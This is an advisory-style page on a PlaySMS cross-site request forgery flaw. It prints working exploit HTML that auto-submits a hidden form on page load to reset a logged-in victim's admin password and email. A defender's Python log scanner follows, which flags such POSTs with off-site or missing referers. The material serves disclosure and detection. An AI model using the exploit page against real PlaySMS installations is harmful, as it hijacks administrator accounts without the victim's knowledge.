PlaySMS Change Admin Password Cross Site Request Forgery Vulnerability
To exploit this issue an attacker must entice an unsuspecting victim to view a malicious webpage. The following exploit code is available:

<html>
<body onload="javascript:document.forms[0].submit()">
<form name="ex" action="http://www.example.com/playsms/web/index.php?app=menu&inc=user_pref&op=user_pref_save" method=post enctype="multipart/form-data">
<input type=hidden size=30 maxlength=30 name=up_password value="admin">
<input type=hidden size=30 maxlength=30 name=up_password_conf value="admin">
<input type=hidden size=30 maxlength=100 name=up_name value="admin">
<input type=hidden size=30 maxlength=30 name=up_email value="admin@gmail.com">
<td><input type=hidden size=30 maxlength=250 name=up_address value=""></td>
<td><input type=hidden size=30 maxlength=100 name=up_city value=""></td>
<td><input type=hidden size=30 maxlength=100 name=up_state value=""></td>
<td><input type=hidden size=10 maxlength=10 name=up_zipcode value=""></td>
<input type=submit class=button value='Save'>
</form>
</body>
</html>
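An added example (not part of the advisory or of PlaySMS): a defender-side check that scans web access logs for POSTs to the `user_pref_save` operation named in the form above and flags those whose Referer is missing or off-site. The combined log format, the sample log lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Query parameters of the state-changing request, taken from the advisory's form action.
TARGET = {"app": "menu", "inc": "user_pref", "op": "user_pref_save"}

# Apache/nginx "combined" access log format (assumed).
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

def is_pref_save(uri):
    """True if the request URI carries all three target query parameters."""
    q = parse_qs(urlsplit(uri).query)
    return all(q.get(k, [None])[-1] == v for k, v in TARGET.items())

def suspicious_saves(lines, site_host):
    """Return (ip, timestamp, reason, referer_host) for preference saves
    that did not originate from a page on site_host."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST" or not is_pref_save(m["uri"]):
            continue
        ref = m["referer"]
        ref_host = urlsplit(ref).hostname if ref not in ("", "-") else None
        if ref_host is None:
            reason = "missing-referer"
        elif ref_host != site_host.lower():
            reason = "cross-origin-referer"
        else:
            continue  # same-site submission, expected behaviour
        hits.append((m["ip"], m["ts"], reason, ref_host))
    return hits

# Constructed sample log lines (not real traffic).
URI = "/playsms/web/index.php?app=menu&inc=user_pref&op=user_pref_save"
SITE = "http://www.example.com/playsms/web/index.php"
SAMPLE_LOG = [
    f'198.51.100.7 - - [10/Jan/2024:09:00:01 +0000] "POST {URI} HTTP/1.1" 302 - "{SITE}" "Mozilla/5.0"',
    f'198.51.100.7 - - [10/Jan/2024:09:14:22 +0000] "POST {URI} HTTP/1.1" 302 - "http://attacker.invalid/page.html" "Mozilla/5.0"',
    f'203.0.113.9 - - [10/Jan/2024:09:20:05 +0000] "POST {URI} HTTP/1.1" 302 - "-" "Mozilla/5.0"',
    f'203.0.113.9 - - [10/Jan/2024:09:21:00 +0000] "GET {URI} HTTP/1.1" 200 512 "http://attacker.invalid/page.html" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in suspicious_saves(SAMPLE_LOG, "www.example.com"):
        print(hit)
```

Browsers and privacy proxies can strip the Referer header, so `missing-referer` hits are leads to triage rather than confirmed forgeries; the multipart POST body is not in an access log, so the submitted password value is not visible here.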